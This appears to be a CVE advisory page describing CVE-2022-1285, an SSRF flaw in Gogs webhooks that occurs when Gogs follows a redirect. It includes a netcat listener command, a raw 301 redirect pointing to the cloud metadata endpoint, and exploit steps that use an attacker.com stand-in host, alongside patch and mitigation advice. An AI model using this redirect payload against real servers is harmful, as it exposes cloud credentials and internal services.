Gogs, Server-Side Request Forgery (SSRF), CVE-2022-1285 (Medium) -DC-Jun2026-564

By /

Listen to this Post

How CVE-2022-1285 Works

Gogs is a self-hosted Git service that allows repository administrators to configure webhooks, which trigger HTTP requests to external URLs upon specific events. CVE-2022-1285 is a Server-Side Request Forgery (SSRF) vulnerability that exists in Gogs versions prior to 0.12.8. The root cause lies in how the webhook functionality handles HTTP redirects.
The vulnerability is a Time-of-Check to Time-of-Use (TOCTOU) issue. When a webhook URL is initially created or tested, Gogs validates that its hostname does not resolve to a local or private IP address (e.g., 127.0.0.1, 192.168.0.0/16). However, at the time of the actual webhook delivery, Gogs performs a new DNS lookup and does not re-validate the resolved IP address. This allows an attacker to bypass the initial validation.
An attacker can exploit this by creating a webhook with a URL that resolves to an external server they control. This server is configured to respond with an HTTP redirect status code (e.g., `301 Moved Permanently` or 308 Permanent Redirect), pointing to an internal or sensitive resource like a cloud metadata service (http://169.254.169.254/metadata/v1.json`). When Gogs follows this redirect, it sends the request to the internal IP address, effectively allowing the attacker to probe and access internal services. This is particularly dangerous on cloud platforms (AWS, GCP, DigitalOcean) where metadata endpoints can expose sensitive information like access keys. The vulnerability affects all Gogs installations that accept public traffic.
<h2 style="color: blue;">DailyCVE Form</h2>
Platform: Gogs
Version: < 0.12.8
Vulnerability: SSRF
Severity: Medium
Date: 2022-06-01
<h2 style="color: blue;">Prediction: 2022-06-01 (Patched)</h2>
<h2 style="color: blue;">What Undercode Say</h2>
The following is a the technical analysis and commands related to this CVE.
<h2 style="color: blue;">Analytics:</h2>
<h2 style="color: blue;">Vulnerability Type: Server-Side Request Forgery (SSRF)</h2>
<h2 style="color: blue;">Attack Vector: Malicious HTTP redirects in webhook URLs</h2>
<h2 style="color: blue;">Bypass Technique: Time-of-Check to Time-of-Use (TOCTOU)</h2>
Target Endpoint:http://169.254.169.254/metadata/v1.json`

Exploit Prerequisite: Ability to create a webhook

Affected Functionality: Webhook delivery mechanism

Root Cause: Lack of re-validation on redirect

Patch Version: v0.12.8

Fix Commit: `7885f454a4946c4bbec1b4f8c603b5eea7429c7f`

Security Advisory: GHSA-c4v7-xg93-qf8g

Commands:

Start a netcat listener to act as the malicious redirector
nc -l -p 8080
Once a connection is received, send the following HTTP response to trigger the SSRF
HTTP/1.1 301 Moved Permanently
Location: http://169.254.169.254/metadata/v1.json
Content-Length: 0
Connection: close

How Exploit:

  1. The attacker sets up a server under their control that listens for incoming HTTP requests.
  2. In the Gogs repository settings, the attacker creates a new webhook and sets its “Payload URL” to the attacker’s server (e.g., `http://attacker.com:8080`).
  3. The attacker tests the webhook or triggers an event that causes Gogs to send a request to the webhook URL.
  4. Gogs connects to the attacker’s server, which responds with a `301` or `308` redirect to an internal address like `http://169.254.169.254/metadata/v1.json`.
  5. Gogs follows the redirect and sends a request to the internal metadata service.
  6. The response from the internal service is returned to the attacker, potentially exposing sensitive information.

Protection:

Upgrade Gogs: The primary and most effective protection is to upgrade to Gogs version `0.12.8` or later.
Implement Redirect Validation: Apply the official fix which leverages `Client.CheckRedirect` to re-validate the resolved IP address of any redirect target before following it.
Network Segmentation: Restrict outbound HTTP/S traffic from the Gogs server to private IP ranges and cloud metadata endpoints.
Webhook URL Whitelisting: Implement an allowlist of permitted webhook destinations to prevent connections to any external or internal services.

Impact:

Information Disclosure: An attacker can read sensitive data from internal services, including cloud metadata endpoints (which may contain API keys, SSH keys, and other credentials), internal configuration management systems, and other internal APIs.
Internal Network Scanning: The vulnerability can be used to port-scan internal network hosts and discover other services.
Privilege Escalation: By obtaining cloud credentials, an attacker could potentially gain elevated access to the underlying cloud infrastructure.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top